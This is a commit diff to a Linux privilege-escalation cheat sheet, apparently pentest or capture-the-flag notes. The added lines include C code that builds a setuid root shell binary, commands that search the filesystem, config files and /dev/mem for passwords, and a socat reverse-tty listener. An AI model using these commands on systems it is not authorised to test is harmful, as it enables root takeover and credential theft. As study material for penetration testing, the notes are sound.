Update linux-privesc.md

mhmh55516 · Jun 1, 2019 · 1e6e6fb · 1e6e6fb
1 parent fc210be
commit 1e6e6fb
Showing 1 changed file with 34 additions and 11 deletions.
diff --git a/linux-privesc.md b/linux-privesc.md
@@ -20,7 +20,7 @@ export SHELL=bash (screen when running tmux)
 export TERM=xterm-256color
 stty rows <num> columns <cols>
 ```
-or use Socat for a full reverse tty
+Or use Socat for a full reverse tty
 ```
 socat file:`tty`,raw,echo=0 tcp-listen:12345
 ```
@@ -97,13 +97,17 @@ tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21
 
 
 
-### SUID Files, Root Services, and Others
+### SUID Files, Root Services, and Other Files
 
 Check for things running as root
 ```
 ps aux | grep root
 ps -ef | grep root
 ```
+Check the version of something that's installed
+```
+dpkg -l | grep -i PAM
+```
 Any file-systems mounted or unmounted?
 ```
 mount
@@ -115,7 +119,13 @@ Then do suid/guid and other interesting files.
 find / -perm -4000 -exec ls -al -print 2>/dev/null {} \;
 find / -uid 0 -perm -4000 2>/dev/null
 ```
-
+To create our own SUID binary
+```
+print 'int main(void){\nsetresuid(0, 0, 0);\nsystem("/bin/sh");\n}' > /tmp/suid.c   
+gcc -o /tmp/suid /tmp/suid.c  
+sudo chmod +x /tmp/suid 
+sudo chmod +s /tmp/suid 
+```
 
 SGID (chmod 2000) - run as the group, not the user who started it.
 ```
@@ -127,7 +137,6 @@ find / -perm -u=s -type f 2>/dev/null
 ```
 Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
 
-
 ```
 find / -perm -1000 -type d 2>/dev/null 
 ```
@@ -157,27 +166,41 @@ To find a specific file
 ```
 find /. -name suid\*
 ```
-Check the version of something that's installed
+Files with passwords?
 ```
-dpkg -l | grep -i PAM
+grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
+find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
 ```
-
-Find all perl files ownd by rootme in /var/www
+Find .conf files(recursive 4 levels) and output line number where the word 'password' is located
 ```
-find /var/www -user rootme -name "*.pl"
+find / -maxdepth 7 -name *.conf -type f -exec grep -Hn password {} \; 2>/dev/null
 ```
 
+Or other sensitive files
+```
+$ locate password | more           
+/boot/grub/i386-pc/password.mod
+/etc/pam.d/common-password
+/etc/pam.d/gdm-password
+/etc/pam.d/gdm-password.original
+/lib/live/config/0031-root-password
+```
 
-Find .conf files(recursive 4 levels) and output line number where the word 'password' is located
+Find all perl files ownd by rootme in /var/www
 ```
-find / -maxdepth 7 -name *.conf -type f -exec grep -Hn password {} \; 2>/dev/null
+find /var/www -user rootme -name "*.pl"
 ```
 
 Scan for string in all files in a directory
 ```
 du . | awk '{print $2}'| grep -rnw "string" --color
 ```
 
+Find password strings in memory 
+```
+strings /dev/mem -n10 | grep -i PASS
+```
+
 ### Cron 
 Look through these
 ```